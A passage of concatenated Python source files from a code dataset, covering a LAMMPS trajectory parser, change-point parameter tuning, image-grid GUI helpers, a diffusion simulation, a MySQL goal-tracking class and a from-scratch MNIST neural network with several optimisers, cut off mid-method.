bondlevel[s1].append(level)\n bondlevel[s2].append(level)\n else:\n bond[s1].append(s2)\n bond[s2].append(s1)\n return bondlevel if readlevel else bond\n\n def readcrd(self, item):\n \"\"\"Only this function can read coordinates.\"\"\"\n (_, lines), _ = item\n boxsize = []\n step_atoms = []\n ids = []\n for line in lines:\n if line:\n if line.startswith(\"ITEM:\"):\n linecontent = self.LineType.linecontent(line)\n else:\n if linecontent == self.LineType.ATOMS:\n s = line.split()\n ids.append(int(s[0]))\n step_atoms.append(Atom(\n self.atomname[int(s[1]) - 1],\n tuple(map(float, s[2: 5]))))\n elif linecontent == self.LineType.BOX:\n s = line.split()\n boxsize.append(float(s[1])-float(s[0]))\n # sort by ID\n step_atoms = [x for (y, x) in sorted(zip(ids, step_atoms))]\n step_atoms = Atoms(step_atoms, cell=boxsize, pbc=self.pbc)\n return step_atoms, ids\n\n class LineType(Enum):\n \"\"\"Line type in the LAMMPS dump files.\"\"\"\n\n TIMESTEP = auto()\n ATOMS = auto()\n NUMBER = auto()\n BOX = auto()\n OTHER = auto()\n\n @classmethod\n def linecontent(cls, line):\n \"\"\"Return line content.\"\"\"\n if line.startswith(\"ITEM: TIMESTEP\"):\n return cls.TIMESTEP\n if line.startswith(\"ITEM: ATOMS\"):\n return cls.ATOMS\n if 
line.startswith(\"ITEM: NUMBER OF ATOMS\"):\n return cls.NUMBER\n if line.startswith(\"ITEM: BOX\"):\n return cls.BOX\n return cls.OTHER\n","sub_path":"mddatasetbuilder/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":9593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"329354621","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 6 09:09:50 2017\r\n\r\n@author: muramatsu\r\n\"\"\"\r\n\r\n# -*- coding: utf-\r\n# noinspection PyUnresolvedReferences\r\nimport matplotlib.pyplot as plt\r\nimport changefinder\r\nimport numpy as np\r\nimport pandas as pd\r\nimport statsmodels.tsa.stattools as stt\r\nfrom skopt import gp_minimize\r\nfrom skopt.plots import plot_convergence\r\nimport seaborn as sns\r\nimport math\r\n\r\n#input data\r\ndf = pd.read_csv(\"indices_I101.csv\",header=None)[1]\r\ntmp = np.array(df)\r\n\r\npcf = stt.pacf(tmp)\r\n# noinspection PyUnresolvedReferences\r\nlag = np.argsort(np.absolute(pcf))[::-1][1]\r\n\r\n#function to calculate change score\r\ndef scoreCalculate(r,smooth):\r\n cf = changefinder.ChangeFinder(r=r, order=lag, smooth=smooth)\r\n ret = []\r\n for i in tmp:\r\n score = math.exp(cf.update(i))\r\n ret.append(score)\r\n return ret\r\n \r\n \r\n#function to optimize\r\ndef func(params):\r\n r,smooth = params\r\n return np.var(scoreCalculate(r, smooth))\r\n\r\n#parameter bounds\r\ndimensions = [(0.1, 0.5), \r\n (3,100),\r\n] \r\n\r\n#minimize variance of change score\r\nres_gp = gp_minimize(func, dimensions, n_calls=10, random_state=0,n_random_starts=10)\r\nprint(res_gp.x)\r\n\r\n#change score with best param\r\nscore = scoreCalculate(res_gp.x[0],res_gp.x[1])\r\n\r\n#plot result\r\nfig = plt.figure(figsize=(13, 7))\r\nax = fig.add_subplot(111)\r\nax.plot(score)\r\nax2 = ax.twinx()\r\nax2.plot(tmp,'r')\r\nplt.show()\r\n\r\n#convergence\r\nplot_convergence(res_gp)\r\n#density of change score\r\nsns.distplot(score, hist=False)\r\n\r\n#output change score as csv\r\npd.DataFrame(score).to_csv(\"score.csv\")\r\n","sub_path":"changeFinderParamEstimate.py","file_name":"changeFinderParamEstimate.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"421488718","text":"# Import required libraries\nimport os\nimport ctypes\nimport cv2\nimport io\n\nfrom PIL import Image, ImageTk\n\n# Get native screen resolution, times the ratio for native compatible resolution, avoid bleeding edges\ndef get_scr_size(ratio):\n user32 = ctypes.windll.user32 # ctypes function\n scr_size = user32.GetSystemMetrics(0), user32.GetSystemMetrics(1) # ctypes function, returns a list of parameters\n scr_width = scr_size[0]\n scr_height = scr_size[1]\n width = int(scr_width * ratio) # get width*ratio, for later GUI scaling\n height = int(scr_height * ratio) # get height*ratio, for later GUI scaling\n\n return width, height\n\n# Draw a grid on to the image, using an overlay image of grid\n# Could use an another approach, using PySimpleGUI graphing functions since images are shown on graph-based canvas\ndef gui_draw(parent_path, file_name):\n # Draw a guidance grid onto the image\n img = cv2.imread(file_name)\n # Avoid using static addresses\n # Use this instead, but be cautious :\n # grid_img = cv2.imread(os.getcwd() + \"\\\\data_process\\\\ref_image\\\\imGrid.png\")\n # Make sure the working files are in the right positions before use\n grid_img = cv2.imread(parent_path + \"\\\\data_process\\\\grid_img\\\\imGrid.png\")\n 
### Debug: show Grid image\n # cv2.imshow(\"Image\", grid_img)\n # cv2.waitKey()\n\n rows, cols, channel = grid_img.shape\n roi = img[0:rows, 0:cols]\n\n # Add grid to the selected reference image\n img2gray = cv2.cvtColor(grid_img, cv2.COLOR_BGR2GRAY)\n ret, mask = cv2.threshold(img2gray, 200, 255, cv2.THRESH_BINARY_INV)\n mask_inv = cv2.bitwise_not(mask)\n img = cv2.bitwise_and(roi, roi, mask=mask_inv)\n grid_img_fg = cv2.bitwise_and(grid_img, grid_img, mask=mask)\n img = cv2.add(img, grid_img_fg)\n\n # Get file name, write the image with grid. This will be used in later processing\n name = os.path.splitext(file_name)[0]+\"_grid.jpg\"\n # Avoid using static addresses\n # Use this instead, but be cautious:\n # file_path = os.path.join(os.getcwd()+\"\\\\data_process\\\\ref_image\", name)\n file_path = os.path.join(os.getcwd() + \"\\\\data_process\\\\ref_image\", name)\n cv2.imwrite(file_path, img)\n return file_path\n\n# Convert image data to base64 values, for later drawing on graph canvas\ndef get_img_data(f, max_size, first=False):\n img = Image.open(f)\n img.thumbnail(max_size, resample=Image.BICUBIC)\n if first:\n b_io = io.BytesIO()\n img.save(b_io, format=\"PNG\")\n del img\n return b_io.getvalue()\n return ImageTk.PhotoImage(img)\n","sub_path":"infoGUI.py","file_name":"infoGUI.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"13504884","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom scipy.optimize import leastsq\nimport random\nfrom numba import jit\n\n\n#defining initial constants.\nD = 2.0\nX = 2.0\nN = 20.0\nx = 40\ndl = X/x\ndt = dl**2/8\nt = 201\nrho = np.zeros((x,t))\nrho[19,0] = 1.0\nrho[20,0] = 0.7\nrho[18,0] = 0.7\n\n#jit is used for speeding up the process\n@jit\ndef calc_rho(t):\n\tfor n in range (t-1):\n\t\tfor i in range (0,39):\n\t\t\trho[i,n+1] = rho[i,n] + (D*dt/dl**2)*(rho[i+1,n]+rho[i-1,n]-2*rho[i,n])\n\t\t\t#print rho[i,n+1]\n\treturn rho\n\n\nrho = calc_rho(201)\n#need x to plot and fit\nx = (np.linspace(-20,21,40))*dl\n\n#fitting\ndef gaussian(x, a, s):\n\treturn a/np.sqrt(2*np.pi*s)*np.exp(-(x)**2/(2*s))\n\n#need to fit 5 plots, let's define some initial variables\ntime = [0.0]*5\nopt_func = [0.0]*5\nfit_A = [0.0]*5\nfit_sigma = [0.0]*5\n\nT = np.linspace(0, t-1, 5).astype(int)\n\n#here is where the fitting begins\nfor m in range(5):\n\tguess_A = 0.4\n\tguess_sigma = 10\n\topt_func = lambda p: p[0]/np.sqrt(2*np.pi*p[1])*np.exp(-(x)**2/(2*p[1]))-rho[:,T[m]]\n\tfit_A[m], fit_sigma[m] = leastsq(opt_func, [guess_A, guess_sigma]) [0]\n\n\nx1 = (np.linspace(-20,21,400))*dl\n\n#LaTeX converter\nplt.rc('text', usetex = True)\n\ntime = T*dt\n\n\nplt.figure()\n#finally plotting\nplt.plot(x, rho[:,T[0]], 'k.')\nplt.plot(x1, gaussian(x1,fit_A[0], fit_sigma[0]), 'm', linewidth = 2, label = r' T = 0')\nplt.plot(x, rho[:,T[1]], 'ko')\nplt.plot(x1, gaussian(x1,fit_A[1],fit_sigma[1]),'b-', linewidth = 2, label = r' T = 40')\nplt.plot(x, rho[:,T[2]], 'kx')\nplt.plot(x1, gaussian(x1,fit_A[2], fit_sigma[2]),'r-', linewidth = 2, label = r' T = 80')\nplt.plot(x, rho[:,T[3]], 'kv')\nplt.plot(x1, gaussian(x1,fit_A[3], fit_sigma[3]),'g-', linewidth = 2, label = r' T = 120')\nplt.plot(x, rho[:,T[4]], 'k^')\nplt.plot(x1, gaussian(x1,fit_A[4], fit_sigma[4]),'c-', linewidth = 2, label = r' T = 160')\nplt.plot(x, rho[:,T[0]], 'k.')\n\nplt.ylabel(r'PDF(arb.)',fontsize = 16)\nplt.legend(loc = 'upper right')\nplt.title (r'Probability distribution function (PDF) at 
different times', fontsize = 16)\nplt.axis([-1.5,1.5,0,1])\n#plt.show() \nplt.savefig('Problem2.pdf')\n\nplt.close()\nplt.figure()\nplt.plot(time[0:4], fit_sigma[0:4], 'b--o',linewidth = 3)\nplt.xlabel(r't (arb.)', fontsize = 16)\nplt.ylabel(r'$\\sigma^2$(arb.)',fontsize = 16)\nplt.title (r'Standard deviation as a function of time', fontsize = 16)\nplt.savefig('Problem2b.pdf')\n\n","sub_path":"scripts/OBSOLETE/PHY566_GroupD_Project.py","file_name":"PHY566_GroupD_Project.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"445024152","text":"\n\nfrom modules.portal_sns import connection\n\nfrom MySQLdb.cursors import DictCursor\nimport MySQLdb\nimport hashlib\nimport datetime\nimport sys\nimport threading\nsys.path.append(\"../../modules\")\n\nclass MonthlyGoal():\n\n\n def __init__(self):\n\n MonthlyGoal.db = connection()\n # self.db.ping(True)\n\n def __del__(self):\n # self.db.close()\n pass\n\n \n def cursor(self):\n cursor = self.db.cursor(DictCursor)\n return cursor\n\n\n def uuid_generator(self, uid, title):\n return hashlib.sha256((uid+title).encode()).hexdigest()\n\n\n def insert(self, uid, title, detail):\n \n today = datetime.date.today()\n date = datetime.datetime(today.year, today.month, 1)\n uuid =self.uuid_generator(uid, title)\n\n stmt = \"\"\" INSERT INTO monthly_goal\n (title, detail, member_uuid, goal_uuid, date, completed, delete_flg)\n VALUE (%s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n\n cursor = self.cursor()\n params = (title, detail, uid, uuid, date , 0, 0)\n try:\n cursor.execute(stmt, params)\n self.db.commit()\n cursor.close()\n return uuid\n\n except:\n self.db.rollback()\n cursor.close()\n return False\n\n\n def get_list_by_uid(self, uid, year=False, month=False):\n\n print(threading.get_ident())\n today = datetime.datetime.today()\n\n if not year:\n year = today.year\n\n if not month:\n month = today.month\n \n date = datetime.datetime(year, month, 1)\n\n stmt = \"\"\"SELECT title, detail, goal_uuid, completed FROM monthly_goal\n WHERE member_uuid=%s AND date=%s AND delete_flg='0'\"\"\"\n\n params = (uid, date)\n cursor = self.cursor()\n # print(id(cursor))\n try:\n cursor.execute(stmt, params)\n result = cursor.fetchall()\n # print(cursor.nextset())\n\n cursor.close()\n # print(result)\n return result\n \n except MySQLdb.Error as e:\n print(\"goal error\", e)\n cursor.close()\n return []\n\n\n def update(self, uuid, is_complete, delete_flg):\n\n stmt = \"\"\"UPDATE monthly_goal set completed=%s, delete_flg=%s WHERE goal_uuid=%s;\n \"\"\"\n\n cursor = self.cursor()\n\n try:\n cursor.execute(stmt, (is_complete, delete_flg, uuid))\n self.db.commit()\n cursor.close()\n return True\n\n except:\n self.db.rollback()\n cursor.close()\n return False\n\n def get(self, uuid):\n\n stmt = \"SELECT * FROM monthly_goal WHERE goal_uuid=%s\"\n cursor = self.cursor()\n\n cursor.execute(stmt, (uuid, ))\n result = cursor.fetchone()\n cursor.close()\n return result","sub_path":"dao/monthly_goal.py","file_name":"monthly_goal.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"139966086","text":"from keras.datasets import fashion_mnist\nfrom keras.datasets import mnist\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport copy\nfrom sklearn.model_selection import train_test_split \nimport pickle\nimport pandas as pd\nimport wandb\nimport os\n\n\nconfig_ = {\n 'learning_rate': 
0.001,\n 'epochs': 10,\n 'no_hidden_layers': 3,\n 'size_hidden_layers':128,\n 'optimizer': 'nadam',\n 'batch_size':100,\n 'activation': 'tanh',\n 'weight_initializations': 'random',\n 'weight_decay': 0,\n 'loss_function':'ce'\n }\n\nmodel_name = 'Assignment1/mnist-model/'\n#folder name end it with a /\n\ngamma = 0.9\nbeta = 0.9\nepsilon = 0.00000001\nbeta1 = 0.9\nbeta2 = 0.99\nno_classes = 10\n\n\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\ntrain_images,val_images, train_labels, val_labels=train_test_split(train_images, train_labels,test_size=0.1,random_state=1)\ntrain_images = np.array(train_images)\ntrain_images = train_images / 255.0\nval_images = np.array(val_images)\nval_images = val_images / 255.0\ntest_images = np.array(test_images)\ntest_images = test_images / 255.0\n\n\ntrain_input_neurons = list()\ntest_input_neurons = list()\nval_input_neurons = list()\n\nfor i in range(len(train_images)):\n train_input_neurons.append(list(np.concatenate(train_images[i]).flat))\n\nfor i in range(len(val_images)):\n val_input_neurons.append(list(np.concatenate(val_images[i]).flat))\n\nfor i in range(len(test_images)):\n test_input_neurons.append(list(np.concatenate(test_images[i]).flat))\n\ntrain_input_neurons = np.array(train_input_neurons).T\nval_input_neurons = np.array(val_input_neurons).T\ntest_input_neurons = np.array(test_input_neurons).T\n\n\n\n\nclass NN(object):\n def __init__(self, hidden_layers, num_outputs,batch_size,learning_rate, epoch,activation,weight_init,weight_decay,loss_function):\n self.num_inputs = len(train_input_neurons)\n self.hidden_layers = hidden_layers\n self.num_outputs = num_outputs\n self.num_classes = num_outputs\n self.batch_size = batch_size\n self.learning_rate = learning_rate\n self.epoch = epoch\n self.iterations = 0\n self.activation = activation\n self.weight_init = weight_init\n self.weight_decay = weight_decay\n self.loss_function = loss_function\n layers = [self.num_inputs] + hidden_layers + [self.num_outputs]\n\n np.random.seed(0)\n self.weights = []\n self.bias = []\n if self.weight_init == 'random': \n for i in range(len(layers)-1):\n self.weights.insert(i, (np.random.rand(layers[i+1], layers[i]) - 0.5))\n self.bias.insert(i, (np.random.rand(layers[i+1],1) - 0.5))\n else:\n for i in range(len(layers)-1):\n sd = 6/(layers[i+1]+layers[i])\n self.weights.insert(i, (np.random.uniform(low = -sd ,high = sd, size =(layers[i+1], layers[i]))))\n self.bias.insert(i, (np.random.uniform(low = -sd ,high = sd, size = (layers[i+1],1))))\n \n \n \n def sigmoid(self, x):\n \n x = x.T\n y = np.zeros(x.shape)\n for i in range(y.shape[0]):\n y[i] = 1.0 / (1 + np.exp(-x[i]))\n \n return y.T\n\n\n def tanh(self,x):\n x = x.T\n y = np.zeros(x.shape)\n for i in range(y.shape[0]):\n y[i] = (np.exp(x[i]) - np.exp(-x[i])) / (np.exp(x[i]) + np.exp(-x[i]))\n return y.T\n\n def Relu(self,x):\n x = x.T\n y = np.zeros(x.shape)\n for i in range(y.shape[0]):\n y[i] = np.maximum(x[i],0)\n return y.T\n\n def d_sigmoid(self, x): \n y = self.sigmoid(x)\n y = y * (1 - y)\n return y\n\n def d_tanh(self,x):\n x = x.T\n y = np.zeros(x.shape)\n for i in range(y.shape[0]):\n y[i] = 1-np.power((np.exp(x[i]) - np.exp(-x[i])) / (np.exp(x[i]) + np.exp(-x[i])),2)\n return y.T\n\n def d_Relu(self,x):\n x = x.T\n y = np.zeros(x.shape)\n for i in range(y.shape[0]):\n y[i] = np.where(x[i] <= 0, 0, 1)\n return y.T\n\n def softmax(self, x):\n \n x = x.T\n y = np.zeros(x.shape)\n for i in range(x.shape[0]):\n y[i] = np.exp(x[i])/sum(np.exp(x[i]))\n \n return y.T\n\n def 
softmax_num_sable(self, x):\n \n x = x.T\n y = np.zeros(x.shape)\n for i in range(x.shape[0]):\n exps = x[i] - np.max(x[i])\n exps = np.exp(exps)\n y[i] = exps/sum(exps)\n return y.T\n\n def forward_prop(self, X):\n hiden_operation = 1\n self.ai = {}\n self.hi = {}\n self.hi[hiden_operation - 1] = X\n self.ai[hiden_operation - 1] = X\n\n for w,b in zip(self.weights, self.bias):\n if(hiden_operation < len(self.weights)):\n self.ai[hiden_operation] = w.dot(self.hi[hiden_operation-1]) + b\n if(self.activation =='sigmoid'):\n self.hi[hiden_operation] = self.sigmoid(self.ai[hiden_operation])\n elif(self.activation =='tanh'):\n self.hi[hiden_operation] = self.tanh(self.ai[hiden_operation])\n elif(self.activation =='Relu'):\n self.hi[hiden_operation] = self.Relu(self.ai[hiden_operation])\n hiden_operation += 1\n \n else:\n self.ai[hiden_operation] = w.dot(self.hi[hiden_operation-1]) + b\n self.hi[hiden_operation] = self.softmax_num_sable(self.ai[hiden_operation])\n \n return self.hi, self.ai, self.hi[hiden_operation]\n\n def one_hot(self, y):\n one_hot_Y = np.zeros((len(y), self.num_classes ))\n one_hot_Y[np.arange(len(y)), y] = 1\n one_hot_Y = one_hot_Y\n return one_hot_Y\n\n def backward_prop(self, h, a, y_hat, y):\n eY = self.one_hot(y)\n if self.loss_function == 'ce':\n d_al_theta = y_hat - eY.T\n elif self.loss_function == 'sq':\n d_al_theta = (y_hat - eY.T) * y_hat * (1 - y_hat) \n\n self.d_weights = {}\n self.d_bias ={}\n self.d_h = {}\n self.d_a = {}\n no_of_samples = len(h[0])\n\n L = len(self.hidden_layers)\n self.d_a[L+1] = d_al_theta\n \n \n for k in range(L, -1, -1):\n \n self.d_weights[k] = ((1/no_of_samples) * self.d_a[k+1].dot(h[k].T)) + (self.weight_decay * self.weights[k])\n self.d_bias[k] = ((1/no_of_samples) * np.sum(self.d_a[k+1], axis = 1, keepdims = True)) + (self.weight_decay *self.bias[k] )\n self.d_h[k] = self.weights[k].T.dot(self.d_a[k+1])\n if(self.activation =='sigmoid'):\n self.d_a[k] = self.d_h[k] * self.d_sigmoid(a[k])\n elif(self.activation =='tanh'):\n self.d_a[k] = self.d_h[k] * self.d_tanh(a[k])\n elif(self.activation =='Relu'):\n self.d_a[k] = self.d_h[k] * self.d_Relu(a[k])\n return self.d_weights, self.d_bias\n \n def get_prediction(self, y):\n return np.argmax(y, 0)\n \n def get_accuracy(self, prediction, y):\n return np.sum(prediction == y) / y.size\n\n def make_predictions(self, x):\n _, _, y_hatt = self.forward_prop(x)\n predictions = self.get_prediction(y_hatt)\n return predictions\n\n def cross_entropy(self, y,yhat):\n return (-sum([math.log(yhat[y[i],i]) for i in range(len(y))])/len(y)) + (self.weight_decay*0.5 * (np.sum([np.linalg.norm(self.weights[i]) for i in range(len(self.weights))])))\n\n def mse(self, y,yhat):\n return (np.sum(np.square(yhat- (self.one_hot(y)).T)))/len(y) + (self.weight_decay*0.5 * (np.sum([np.linalg.norm(self.weights[i]) for i in range(len(self.weights))])))\n\n def test_prediction(self, current_image, y):\n prediction = self.make_predictions(current_image)\n label = y\n print(\"Prediction: \", prediction)\n print(\"Label: \", label) \n current_image = current_image.reshape((28, 28)) * 255\n plt.gray()\n plt.imshow(current_image, interpolation='nearest')\n plt.show()\n\n def logging(self,j):\n output_h, output_a, y_hat = self.forward_prop(train_input_neurons)\n predictions = self.get_prediction(y_hat)\n accuracy = self.get_accuracy(predictions, train_labels)\n if(self.loss_function =='ce'):\n loss_train = self.cross_entropy(train_labels,y_hat)\n elif self.loss_function =='sq':\n loss_train = self.mse(train_labels,y_hat)\n 
output_h, output_a, y_hat = self.forward_prop(val_input_neurons)\n val_predictions = self.get_prediction(y_hat)\n val_accuracy = self.get_accuracy(val_predictions, val_labels)\n if(self.loss_function =='ce'):\n loss_valid = self.cross_entropy(val_labels,y_hat)\n elif self.loss_function =='sq':\n loss_valid = self.mse(val_labels,y_hat)\n print(\"epoch______{} : {}\".format(j, accuracy))\n wandb.log({\n \"epoch\": j,\n \"loss\": loss_train,\n \"accuracy\": accuracy,\n \"val_loss\": loss_valid,\n \"val_accuracy\": val_accuracy})\n\n\n def confusion_matrix(self, actual_labels, predicted_labels):\n available_classes = np.unique(np.concatenate((actual_labels,predicted_labels)))\n confusion_matrix_ = np.zeros((len(available_classes),len(available_classes)),dtype=int)\n for i,actual in enumerate(available_classes):\n for j,predicted in enumerate(available_classes):\n confusion_matrix_[i,j] = np.where((actual_labels == actual)&(predicted_labels == predicted))[0].shape[0]\n\n wandb.log({ \"Confusion Matrix\" : wandb.plot.confusion_matrix( \n probs = None,\n y_true = actual_labels,\n preds = predicted_labels,\n class_names = available_classes\n )\n })\n return confusion_matrix_\n\n def confusion_matrix_plot(self, confusion_matrix, title='Confusion matrix', cmap=plt.cm.gray_r):\n confusion_matrix = confusion_matrix/10\n plt.matshow(confusion_matrix, cmap=cmap)\n #plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(confusion_matrix))\n plt.xticks(tick_marks)\n plt.yticks(tick_marks)\n plt.ylabel(\"actual\")\n plt.xlabel(\"predicted\")\n\n\n\n def gradient_descent(self, input_neurons, learning_rate, epoch):\n \n for j in range(epoch):\n output_h, output_a, y_hat = self.forward_prop(input_neurons)\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels)\n for i in range(len(d_weights)):\n self.weights[i] = self.weights[i] - learning_rate * d_weights[i]\n self.bias[i] = self.bias[i] - learning_rate * d_bias[i]\n \n self.logging(j)\n\n return self.weights, self.bias\n\n def sgd(self, input_neurons, learning_rate, epoch):\n for j in range(epoch):\n\n for i in range(input_neurons.shape[1]):\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,i].reshape((input_neurons.shape[0],1)))\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n \n\n for d in range(len(d_weights)):\n self.weights[d] = self.weights[d] - learning_rate * d_weights[d]\n self.bias[d] = self.bias[d] - learning_rate * d_bias[d]\n\n self.logging(j)\n\n return self.weights, self.bias\n\n def momentum_gd(self, input_neurons, gamma):\n self.w_update ={} \n self.b_update ={} \n for j in range(self.epoch):\n self.iterations = math.ceil(input_neurons.shape[1]/self.batch_size)\n for i in range(self.iterations):\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n\n if(j==0 and i==0):\n for d in range(len(d_weights)):\n self.weights[d] = self.weights[d] - self.learning_rate * d_weights[d]\n self.w_update[d] = self.learning_rate * d_weights[d]\n self.bias[d] = self.bias[d] - self.learning_rate * d_bias[d]\n self.b_update[d] = 
self.learning_rate * d_bias[d]\n else:\n for d in range(len(d_weights)):\n self.weights[d] = self.weights[d] - ((gamma *self.w_update[d] )+(self.learning_rate * d_weights[d]))\n self.w_update[d] = (gamma *self.w_update[d] )+(self.learning_rate * d_weights[d])\n self.bias[d] = self.bias[d] - ((gamma *self.b_update[d])+(self.learning_rate * d_bias[d]))\n self.b_update[d] = (gamma *self.b_update[d])+(self.learning_rate * d_bias[d]) \n\n self.logging(j)\n \n return self.weights, self.bias\n\n def nesterov_accelerated_gd(self, input_neurons, gamma):\n self.w_update ={} \n self.b_update ={}\n for j in range(self.epoch):\n self.iterations = math.ceil(input_neurons.shape[1]/self.batch_size)\n for i in range(self.iterations):\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n\n if(j!=0 or i!=0):\n for d in range(len(d_weights)):\n self.weights[d] = self.weights[d] - ((gamma *self.w_update[d] ))\n self.bias[d] = self.bias[d] - ((gamma *self.b_update[d]))\n\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n\n if(j==0 and i==0):\n for d in range(len(d_weights)):\n self.weights[d] = self.weights[d] - self.learning_rate * d_weights[d]\n self.w_update[d] = self.learning_rate * d_weights[d]\n self.bias[d] = self.bias[d] - self.learning_rate * d_bias[d]\n self.b_update[d] = self.learning_rate * d_bias[d]\n else:\n for d in range(len(d_weights)):\n self.weights[d] = self.weights[d] - ((self.learning_rate * d_weights[d]))\n self.w_update[d] = (gamma *self.w_update[d] )+(self.learning_rate * d_weights[d])\n self.bias[d] = self.bias[d] - ((self.learning_rate * d_bias[d]))\n self.b_update[d] = (gamma *self.b_update[d])+(self.learning_rate * d_bias[d]) \n\n\n self.logging(j)\n return self.weights, self.bias\n\n def rmsprop(self, input_neurons, beta,epsilon):\n w_vt ={} \n b_vt ={}\n for j in range(self.epoch):\n self.iterations = math.ceil(input_neurons.shape[1]/self.batch_size)\n for i in range(self.iterations):\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n\n if(j!=0 or i!=0):\n for d in range(len(d_weights)):\n w_vt[d]= beta * w_vt[d] + (1-beta) * np.power(d_weights[d],2)\n b_vt[d] = beta * b_vt[d] + (1-beta) * np.power(d_bias[d],2)\n w = 1/np.power(w_vt[d]+epsilon,0.5)\n b = 1/np.power(b_vt[d]+epsilon,0.5)\n self.weights[d] = self.weights[d] - self.learning_rate *w* d_weights[d]\n self.bias[d] = self.bias[d] - self.learning_rate *b* d_bias[d]\n else:\n for d 
in range(len(d_weights)):\n w_vt[d]= (1-beta) * np.power(d_weights[d],2)\n b_vt[d] = (1-beta) * np.power(d_bias[d],2)\n w = 1/np.power(w_vt[d]+epsilon,0.5)\n b = 1/np.power(b_vt[d]+epsilon,0.5)\n self.weights[d] = self.weights[d] - self.learning_rate *w* d_weights[d]\n self.bias[d] = self.bias[d] - self.learning_rate *b* d_bias[d]\n self.logging(j)\n return self.weights, self.bias\n\n def adam(self, input_neurons,beta1,beta2,epsilon):\n w_mt ={} \n b_mt ={}\n w_vt ={} \n b_vt ={}\n for j in range(self.epoch):\n self.iterations = math.ceil(input_neurons.shape[1]/self.batch_size)\n for i in range(self.iterations):\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n \n if(j!=0 or i!=0):\n for d in range(len(d_weights)):\n w_mt[d]= beta1 * w_mt[d] + (1-beta1) * d_weights[d]\n b_mt[d] = beta1 * b_mt[d] + (1-beta1) * d_bias[d]\n w_vt[d]= beta2 * w_vt[d] + (1-beta2) * np.power(d_weights[d],2)\n b_vt[d] = beta2 * b_vt[d] + (1-beta2) * np.power(d_bias[d],2)\n mt_hat = w_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n vt_hat = w_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n bmt_hat = b_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n bvt_hat = b_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n self.weights[d] = self.weights[d] - (self.learning_rate *(1/np.sqrt(vt_hat+epsilon))* mt_hat)\n self.bias[d] = self.bias[d] - (self.learning_rate *(1/np.sqrt(bvt_hat+epsilon))* bmt_hat)\n else:\n for d in range(len(d_weights)):\n w_mt[d]= (1-beta1) * d_weights[d]\n b_mt[d] = (1-beta1) * d_bias[d]\n w_vt[d]= (1-beta2) * np.power(d_weights[d],2)\n b_vt[d] = (1-beta2) * np.power(d_bias[d],2)\n mt_hat = w_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n vt_hat = w_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n bmt_hat = b_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n bvt_hat = b_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n self.weights[d] = self.weights[d] - (self.learning_rate *(1/np.sqrt(vt_hat+epsilon))* mt_hat)\n self.bias[d] = self.bias[d] - (self.learning_rate *(1/np.sqrt(bvt_hat+epsilon))* bmt_hat)\n \n self.logging(j)\n \n\n return self.weights, self.bias\n\n def nadam(self, input_neurons,beta1,beta2,epsilon):\n w_mt ={} \n b_mt 